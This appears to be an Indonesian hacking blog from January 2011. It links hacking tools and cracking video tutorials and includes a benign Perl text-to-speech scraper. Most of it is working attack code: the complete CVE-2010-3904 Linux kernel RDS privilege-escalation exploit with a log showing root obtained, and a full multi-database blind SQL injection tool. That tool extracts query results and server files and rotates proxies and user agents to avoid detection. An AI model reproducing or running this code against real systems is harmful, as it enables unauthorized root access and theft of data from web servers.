Sabtu, 29 Januari 2011

Google Hack Application


Simple google hack aplication
Download

Hackerfox => mozila firefox for hacker


Portable Mozila Firefox for hacker
Download

Tutorial Reverse Enginering

Cuman sekedar share ajah ^_^
Tutorial ini di bagi menjadi 40 bagian dimana pada setiap bagian akan di jelaskan secara gamblang ^_^ step by step cara melakukan cracking dengan menggunakan Olly dbg dengan berbagai contoh kasus yang berbeda ^_^

Video 1
Video 2
Video 3
Video 4
Video 5
Video 6
Video 7
Video 8
Video 9
Video 10
Video 11
Video 12
Video 13
Video 14
Video 15
Video 16
Video 17
Video 18
Video 19
Video 20
Video 21
Video 22
Video 23
Video 24
Video 25
Video 26
Video 27
Video 28
Video 29
Video 30
Video 31
Video 32
Video 33
Video 34
Video 35
Video 36
Video 37
Video 38
Video 39
Video 40


Selamat Mencoba ^_^

From Text to Speech (Voice) voice.pl

 
#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTML::Form;
use Getopt::Std;

print "Text-to-Speech Nabber by sToRm \n";

my $ua = LWP::UserAgent->new();
my %opts;

getopts('EVe:i:o:p:r:v:', \%opts);

if ( defined $opts{'E'} ) {

    print "Available effects:\n";
   
    my $response = $ua->get('http://cepstral.com/demos/');
   
    die 'Error: ' . $response->status_line() . "\n" unless $response->is_success();
   
    for ( split(/\n/, $response->content()) ) {
   
        print "  $1.sfx\n" if ( $_ =~ // );
       
    }
   
    exit(0);
   
}

if ( defined $opts{'V'} ) {

    print "Available voices:\n";
   
    my $response = $ua->get('http://cepstral.com/demos/');
   
    die 'Error: ' . $response->status_line() . "\n" unless $response->is_success();
   
    for ( split(/\n/, $response->content()) ) {
   
        print "  $1\n" if ( $_ =~ /if \(voice=='(.+)'\) {/ );
       
    }
   
    exit(0);
   
}

if ( defined $opts{'i'} and defined $opts{'o'} ) {

    print "Sending initial request.\n";
   
    my $response = $ua->get('http://demos.cepstral.com/cepstral/demos/demo.cgi/cepstral.wav');
   
    die 'Error: ' . $response->status_line() . "\n" unless $response->is_success();
   
    my $form = HTML::Form->parse($response);
   
    print "Success - Applying settings.\n";
   
    $form->value('content', $opts{'i'});
   
    defined $opts{'e'} ? $form->value('effect', $opts{'e'})
                       : 0;
    defined $opts{'p'} ? $form->value('pitch', $opts{'p'})
                       : 0;
    defined $opts{'r'} ? $form->value('rate', $opts{'r'})
                       : 0;
    defined $opts{'v'} ? $form->value('voice', $opts{'v'})
                       : 0;
   
    print "Fetching audio file.\n";
   
    $ua->request($form->click(), $opts{'o'});
   
    exit(0);
   
}

print "Usage: perl $0 -i \"Your phrase here\" -o outfile.wav [-EVeprv]\n";
print "    -E  List available effects\n";
print "    -V  List available voices\n";
print "    -e  Select a voice effect (default: None)\n";
print "    -i  Define the input string\n";
print "    -o  Define the outfile\n";
print "    -p  Change the pitch of speech (1-76, default: 1)\n";
print "    -r  Change the rate of speech (1-3400, default: 170)\n";
print "    -v  Select a voice to use (default: David)\n";

Jumat, 28 Januari 2011

Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit

Code :
/*
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * and overwrites a function pointer (rds_ioctl) to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RECVPORT 5555
#define SENDPORT 6666

int prep_sock(int port)
{
   
    int s, ret;
    struct sockaddr_in addr;

    s = socket(PF_RDS, SOCK_SEQPACKET, 0);

    if(s < 0) {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }
   
    memset(&addr, 0, sizeof(addr));

    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);

    ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

    if(ret < 0) {
        printf("[*] Could not bind socket.\n");
        exit(-1);
    }

    return s;

}

void get_message(unsigned long address, int sock)
{

    recvfrom(sock, (void *)address, sizeof(void *), 0,
         NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
   
    int size, ret;
    struct sockaddr_in recvaddr;
    struct msghdr msg;
    struct iovec iov;
    unsigned long buf;
   
    memset(&recvaddr, 0, sizeof(recvaddr));

    size = sizeof(recvaddr);

    recvaddr.sin_port = htons(RECVPORT);
    recvaddr.sin_family = AF_INET;
    recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

    memset(&msg, 0, sizeof(msg));
   
    msg.msg_name = &recvaddr;
    msg.msg_namelen = sizeof(recvaddr);
    msg.msg_iovlen = 1;
   
    buf = value;

    iov.iov_len = sizeof(buf);
    iov.iov_base = &buf;

    msg.msg_iov = &iov;

    ret = sendmsg(sock, &msg, 0);
    if(ret < 0) {
        printf("[*] Something went wrong sending.\n");
        exit(-1);
    }
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

    if(!fork()) {
            sleep(1);
            send_message(value, sendsock);
            exit(1);
    }
    else {
        get_message(addr, recvsock);
        wait(NULL);
    }

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

    commit_creds(prepare_kernel_cred(0));
    return -1;   

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    if (rep)
        return 0;
fallback:
    /* didn't find the symbol, let's retry with the System.map
       dedicated to the pointlessness of Russell Coker's SELinux
       test machine (why does he keep upgrading the kernel if
       "all necessary security can be provided by SE Linux"?)
    */
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

int main(int argc, char * argv[])
{
    unsigned long sock_ops, rds_ioctl, target;
    int sendsock, recvsock;
    struct utsname ver;

    printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
    printf("[*] by Dan Rosenberg\n");

    uname(&ver);

    if(strncmp(ver.release, "2.6.3", 5)) {
        printf("[*] Your kernel is not vulnerable.\n");
        return -1;
    }   
   
    sendsock = prep_sock(SENDPORT);
    recvsock = prep_sock(RECVPORT);

    /* Resolve addresses of relevant symbols */
    printf("[*] Resolving kernel addresses...\n");
    sock_ops = get_kernel_sym("rds_proto_ops");
    rds_ioctl = get_kernel_sym("rds_ioctl");
    commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

    if(!sock_ops || !rds_ioctl || !commit_creds || !prepare_kernel_cred) {
        printf("[*] Failed to resolve kernel symbols.\n");
        return -1;
    }

    /* Calculate target */
    target = sock_ops + 9 * sizeof(void *);

    /* Overwrite rds_ioctl function pointer */
    printf("[*] Overwriting function pointer...\n");
    write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);

    /* Trigger the payload */
    printf("[*] Triggering payload...\n");
    ioctl(sendsock, 0, NULL);

    /* Restore the rds_ioctl function pointer */
    printf("[*] Restoring function pointer...\n");
    write_to_mem(target, rds_ioctl, sendsock, recvsock);

    if(getuid()) {
        printf("[*] Exploit failed to get root.\n");
        return -1;
    }

    printf("[*] Got root!\n");
    execl("/bin/sh", "sh", NULL);

}
Tested :
[email protected]:~/Documents$ uname -a
Linux deadc0de-team 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux
[email protected]:~/Documents$ gcc linux-rds-exploit.c -o linux-rds-exploit
[email protected]:~/Documents$ chmod +x linux-rds-exploit
[email protected]:~/Documents$ ./linux-rds-exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xf8491980
 [+] Resolved rds_ioctl to 0xf8479090
 [+] Resolved commit_creds to 0xc01626b0
 [+] Resolved prepare_kernel_cred to 0xc01628b0
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root)
# pwd
/home/d4wfl1n/Documents
# uname -a
Linux deadc0de-team 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux
#

Rabu, 26 Januari 2011

Deadc0de Blind SQL Injection <= to my honey JID :p

I call this hacker_is_death.pl lol hahahahha
this is a simple c0de to try blind SQL Injection and Test vulnerable on the web target :)

dedicated to "Syarifah Sarah Soraya Anajani Haniah Alkaaff" a.k.a "DJ Cleo"
keep play the music honey :)

#!/usr/bin/env perl
# Blind SQL Injection
# Author : D4wFl1N
# thx to : r3d3 deadc0de, black deadc0de, mozart deadc0de, jimmy deadc0de a.k.a jimmy romanticdevil
# and y0u
# TODO:
# [ ] Rip more c0de from others.
#  ______      _____ _             ___          
# |  ____|    / ____| |           / _ \         
# | |__ _   _| |    | | __  _   _| | | |_   _   
# |  __| | | | |    | |/ / | | | | | | | | | |  
# | |  | |_| | |____|   <  | |_| | |_| | |_| |  
# |_|   \__,_|\_____|_|\_\  \__, |\___/ \__,_|  
#                           __/ |              
#                          |___/                
#

use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
use threads;
use threads::shared;
use Time::HiRes qw( usleep);

$| = 1;


###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.0";
my $default_useragent = "deadc0de $version";
my $default_sql = "(select \@\@version)";
###############################################################################


$| = 1;

my ($args, $solution);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my ($head, $tail, $high);
my $hits = 0;
my $amatch = 0;
my ($ua,$req);
my $furl;

###############################################################################
# Define GetOpt:
my ($url, $type, $database, $sql, $time, $rtime, $match, $uagent, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($start, $length, $method, $cookie, $blind);
my ($help, $get);
my ($ascii, $binary);

my $options = GetOptions (
  'help!'            => \$help,
  'url=s'            => \$url,
  'database=s'         => \$database,
  'type=s'             => \$type,   
  'get=s'            => \$get,
  'sql=s'            => \$sql,
  'blind=s'          => \$blind,
  'match=s'          => \$match,
  'start=s'          => \$start,
  'length=s'         => \$length,
  'method=s'         => \$method,
  'uagent=s'         => \$uagent,
  'ruagent=s'         => \$ruagent,
  'cookie=s'         => \$cookie,
  'proxy=s'          => \$proxy,
  'proxy_user=s'     => \$proxy_user,
  'proxy_pass=s'     => \$proxy_pass,
  'rproxy=s'         => \$rproxy,
  'debug!'           => \$debug,
  'binary!'           =>\$binary,
  'ascii!'           => \$ascii,
  'rtime=s'          => \$rtime,
  'time=i'           => \$time
  );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$uagent         ||= $default_useragent;
$debug          ||= $default_debug;
$length         ||= $default_length;
$solution       ||= $start;
$method         ||= $default_method;
$sql            ||= $default_sql;
$time           ||= $default_time;


&createlwp();
&parseurl();

if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (! defined($type)) {
    $type=0;
}

if (! defined($database)) {
    $database=0
}

if (defined($cookie)) { &cookie() }
if (!$match) {
    print "\nTrying to find a match string...\n" if $debug == 1;
    $amatch = "1";
    $match = fmatch("$url"," AND 1=");
    if ($match eq "no vulnerable")
        {
        print "\nNo vuln: 2nd..\n" if $debug ==1;
        $match = fmatch("$url"," AND 1='");
        #$head = "\"";
        #$tail = " AND 1=\"1";
    };
    if ($match eq "no vulnerable") {
        print "Not vulnerable \n\n If you know its vulnerable supply the '-match' string\n";
        exit 0;
    }
}
&banner();
&httpintro();



( ! $get) ? sqlget() : fileget();

my @byte = ();
my $wait_me;

sub getbyte {
   my $sql = $_[0];
   my $bit="";
   my @thread_count = ();
   my $c = 8;
   my $i = 0;
   $high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
   $wait_me = 0;

   share($wait_me);
   share (@byte);

   if ($ascii) {
     $byte[0] = 0;
     $high = 64;
   }
   for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
    $thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
    $thread_count[$i]->detach;
    $c--;
   }

   while ($wait_me <= 7) {
    usleep(50);
    #sleep(1);# if !$dontsleep;
   }

   my $str = join("",@byte);
   #print "\nSTR: $str\n";
   return pack("B*","$str");

}

sub launch_thread {
    my ($sql, $bit, $c) = @_;
    my $val;   
    my $and="%26";
     if (lc($method) eq "post"){
     $and="&";
     }
     ###------------MS-SQL BLOCK STARTS HERE---------------------###

if ($database==0) {


#print "I am here";
        if ($url =~ /'$/) {
      ##   $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
 if ($type==1)
                      {
                         $val = "$head and (select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (select case when ((ASCII($sql) $and $bit) =0)then 1 else 1/0 end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
                      }
                   } 
              
                  }


                }


     ###------------MS-SQL BLOCK STOPS HERE---------------------###
     ###----------POSTGRES BLOCK STARTS HERE---------------------###

if ($database==2) {



        if ($url =~ /'$/) {
   
 if ($type==1)
   
                      {
                         $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1-- $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
                      }
                   } 
              
                  }


                }
###----------POSTGRES BLOCK STOPS HERE---------------------###
###----------ORACLE BLOCK STARTS---------------------------####
     if ($database==3) {
   
if ($url =~ /'$/) {
          if ($type==1)
   
                      {
                         $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1-- $tail";
                      }
              else {    if($type==0)
                      {      
                         $val = "$head and BITAND((ASCII($sql)), $bit)=0-- $tail";                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
                      }
              else {    if($type==0)
                      {      
               $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
                      }
                   } 
              
                  }
                        }


###----------ORACLE BLOCK STOPS HERE---------------------------####
###------------MY-SQL BLOCK STARTS HERE---------------------###

   
    if ($database==1) {
   
   
    if ($url =~ /'$/)        {
          if ($type==1)
                      {
                         $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ord($sql) $and $bit)=0 $tail";
                      }
                   } 
# or one may also use #
                            }
             
                  else
                   
                {
                      if ($type==1)
                      {
                         $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
                      }
              else {if($type==0)
                      {      
              $val = "$head and (ord($sql) $and $bit)=0 $tail";
                      }
                    } 
               

                }
###-----------MySQL BLOCK ENDS HERE-------------------###




 }
                  #print "VAL[$c] $val\n";
        if (lc($method) eq "post") {
                $vars{$lastvar} = $lastval . $val;

        }
        $furl = $url;
        $furl =~ s/($lastvar=$lastval)/$1$val/;
        &createlwp if $rproxy || $ruagent;
        my $html=fetch("$furl");
        $hits++;
        foreach (split(/\n/,$html)) {
        lock @byte;
                if (/\Q$match\E/) {
                    $byte[$c]=0;
                    last;
                 } else { $byte[$c] = 1; }
        }
    lock $wait_me;
    threads->yield();
    $wait_me++;
}

sub sqlget                                    {


    ##--ms-sqlblock--##




if ($database==0 ) {

my ($fsize,$i,$s);
        $s = "SUBSTRING(cast(len(len(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTRING(cast(len(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substring(cast(($sql)as varchar),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }


}

    ##--ms-sql block-finish--##
    ##---oracle block starts--##
if ($database==3) {

    my ($fsize,$i,$s);
        $s = "SUBSTR(cast(length(length(($sql)))as varchar(100)),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar(100)),$i,1)";
        $fsize.=getbyte($s);
    }

    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substr(cast(($sql)as varchar(100)),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }
}


    ##---oracle block finish--##
##--postgres block----##
if ($database==2) {
my ($fsize,$i,$s);
   
        $s = "SUBSTR(cast(length(length(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
       
        $s = "substr(cast(($sql)as varchar),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }


}

    ##--postgres block-finish--##
    ##-mysql block--##
    if ($database==1) {
        my ($fsize,$i,$s);
        $s = "mid(length(length(($sql))),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "mid(length(($sql)),$i,1)";
        $fsize.=getbyte($s);
    }
   
    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "mid(($sql),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }
}

##-mysql-block-##
                                        }

#---------------end-------------------#
sub fileget {
    my ($lget,$fstr);
    if ($get =~ m/.*\/(.*)/) {
        $lget = $1; }
        $fstr = "0x".unpack("H*","$get");
    if ($get =~ m/.*\\(.*)/) {
        $lget = $1;
        $fstr = "\"$get\"";
    }

    my $rsize = $start + 1;
    if (-e "$lget" && ! $start) {
        $rsize = -s "$lget";
        print "Error: file ./$lget exists.\n";
        print "You can erase or resume it with: -start $rsize\n";
        exit 1
    }
    my ($i,$fsize);
    $sql = "mid(length(length(load_file($fstr))),1,1)";
    my $lng .= getbyte($sql);
    for ($i=1;$i<=$lng;$i++) {
        my $find = 0;
        $sql = "mid(length(load_file($fstr)),$i,1)";
        $fsize.=getbyte($sql);
    }

    if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
    $length = $fsize. "bytes";
    # starting ..
    $sql = "load_file($get)";

    &bsqlintro();
    # Get file
    #print "---> $lget";
    open FILE, ">>$lget";
    FILE->autoflush(1);
    print "\n--- BEGIN ---\n";
    my ($i,$b,$fcontent);
    $rsize = 1 if $rsize < 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        my $find = 0;
        my ($furl, $b_start, $b_end, $z);
        $sql = "mid(load_file($fstr),$i,1)";
        $fcontent=getbyte($sql);
        print $fcontent;
        print FILE "$fcontent";
     }
    print "\n--- END ---\n";
        close FILE;
    $solution = "success";
    $sql = "$get";
}



&result();



#########################################################################
sub httpintro {
    my ($strcookie, $strproxy, $struagent, $strtime, $i);
    print "--[ http options ]"; print "-"x62; print "\n";
    printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
    if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
    printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
    printf ("%12s %-50s\n","path:", $path);
    foreach (keys %vars) {
        $i++;
        printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
    }
    if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
    printf ("%12s %-50s\n","cookies:",$strcookie);
    if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
    if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
    printf ("%12s %-50s\n","proxy_host:",$strproxy);
    if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
     # timing
    if (! $time && !$rtime) { $strtime="0sec (default)" }
    if ( $time == 0) { $strtime="0 sec (default)" }
    if ( $time == 1) { $strtime="15 secs" }
    if ( $time == 2) { $strtime="5 mins" }
    if ($rtime) { $strtime = "rnd.time:$rtime" }
    printf ("%12s %-50s\n","time:",$strtime);
    printf("\n\nFinding Length of SQL Query....\n");
}

sub bsqlintro {
    my ($strstart, $strblind, $strlen, $strmatch, $strsql);
    print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
    if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
    if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
    printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
    printf ("%12s %-15s %11s %-20s\n","database:",$database,"type:",$type);
    if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
    if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
    printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
    if ($amatch eq 1) { $strmatch = "auto match:(!!THIS MAY BE WRONG!!)" } else { $strmatch = "match:"; }
    #printf ("%12s %-60s\n","$strmatch",$match);
    print " $strmatch $match\n";
    print "-"x80; print "\n\n";
    printf "\n Getting Data...\n";
}

#########################################################################

sub createlwp {
    my $proxyc;
    &getproxy;
    &getuagent if $ruagent;
    LWP::Debug::level('+') if $debug gt 3;
    $ua = new LWP::UserAgent(
        cookie_jar=> { file => "$$.cookie" });
    $ua->agent("$uagent");
    if (defined($proxy_user) && defined($proxy_pass)) {
        my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
        $proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        $proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
    } else { $proxyc = $proxy; }
   
    $ua->proxy(['http'] => $proxyc) if $proxy;
    undef $proxy if $rproxy;
    undef $uagent if $ruagent;
}   

sub cookie {
    # Cookies check
    if ($cookie || $cookie =~ /; /) {
        foreach my $c (split /;/, $cookie) {
            my ($a,$b) = split /=/, $c;
            if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
        }
    }
}

sub parseurl {
 ###############################################################################
 # Official Regexp to parse URI. Thank you somebody.
    ($scheme, $authority, $path, $query, $fragment) =
        $url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
    # Parse args of URI into %vars and @varsb.
    foreach my $varval (split /&/, $query) {
        my ($var, $val) = split /=/, $varval;
        $vars{$var} = $val;
        push(@varsb, $var);
    }
}


#########################################################################
# Show options at running:
sub banner {
print "\n Are you ready to r0ck ? \n";
print " \n O.K let's play the music DJ_Cle0 ^_^ \n";
}


#########################################################################
# Get differences in HTML
sub fmatch {
 my ($ok,$rtrn);
 my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
 my ($html_a, $html_b);
 if (lc($method) eq "get") {
    $furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
    $furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
     $html_a = fetch("$furla");
    $html_b = fetch("$furlb");
 } elsif (lc($method) eq "post") {
   $vars{$lastvar} = $lastval . " ${quote}1";
   $html_a = fetch("$furla");
   $vars{$lastvar} = $lastval . " ${quote}0";
   $html_b = fetch("$furla");
   $vars{$lastvar} = $lastval;
 }


 #print "$html_a";
 #print "$html_b";

 if ($html_a eq $html_b) {
  $rtrn = "no vulnerable";
  return $rtrn;
 }


 my @h_a = split(/\n/,$html_a);
 my @h_b = split(/\n/,$html_b);
 foreach my $a (@h_a) {
    $ok = 0;
    if ($a =~ /\w/) {
           foreach (@h_b) {
            if ($a eq $_) {$ok = 1; }
        }
    } else { $ok = 1; }
   $rtrn = $a;
   last if $ok ne 1;
 }
 return $rtrn;
}


#########################################################################
# Fetch HTML from WWW
sub fetch {
    #print "fetch: $_[0]\n";
    my $secs;
    if ($time == 0) { $secs = 0 }
    elsif ($time == 1) { $secs = 15 }
    elsif ($time == 2) { $secs = 300 }
    if ($rtime =~ /\d*-\d*/ && $time == 0) {
        my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
        srand; $secs = int(rand($p-$l+1))+$l;
    } elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
        print "You can't run with -time and -rtime. See -help.\n";
        exit 1;
    }
    sleep $secs;
   
    my $res;
    if (lc($method) eq "get") {
        my $fetch = $_[0];
        if ($cookie) {
            $res = $ua->get("$fetch", Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->get("$fetch");
        }
    } elsif (lc($method) eq "post") {
        my($s, $a, $p, $q, $f) =
          $url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
        my $fetch = "$s://$a".$p;
        if ($cookie) {
            $res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
        } elsif (!$cookie) {
            $res = $ua->post("$fetch",\%vars);
        }
    } else {
        die "Wrong httpd method. Use -h for help\n";
    }
    my $html = $res->content();
    return $html;
}


sub getproxy {
    if ($rproxy && $proxy !~ /http/) {
        my @lproxy;
        open PROXY, $rproxy or die "Can't open file: $rproxy\n";
        while() { push(@lproxy,$_) if ! /^#/ }
        close PROXY;
        srand; my $ind = rand @lproxy;
        $proxy = $lproxy[$ind];
    } elsif ($rproxy && $proxy =~ /http/)  {
        print "You can't run with -proxy and -rproxy. See -help.\n";
        exit 1;
    }
}

sub getuagent {
        my @uproxy;
        open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
        while() { push(@uproxy,$_) if ! /^#/ }
        close UAGENT;
        srand; my $ind = rand @uproxy;
        $uagent = $uproxy[$ind];
        chop($uagent);
}

sub result {
    print "\r results:\n" ." $sql = $solution\n" if length($solution) > 0;
    #print " total hits: $hits\n";
    my $blah= length($solution);
    if ($blah<2)
    {print "\n !!!!!!Errrrrrrr.. something is not quite right.. see below!!!!!\n";
     print "-------------------------------------------------------";
     print "\n1 In a string based injection, vulnerable parameter must end with single quote(')\n\t eg. some_file.php?id=foo'";
     print "\n2 AND don't forget to provide me a unique true response with -match";
     print "\n3 Also Check that the SQL Query you supplied returns only one row\n";
     print "-------------------------------------------------------\n\n\n";
    }
}

sub help {
    &banner();
        print " ---------------------usage:-------------------------------------------\n";
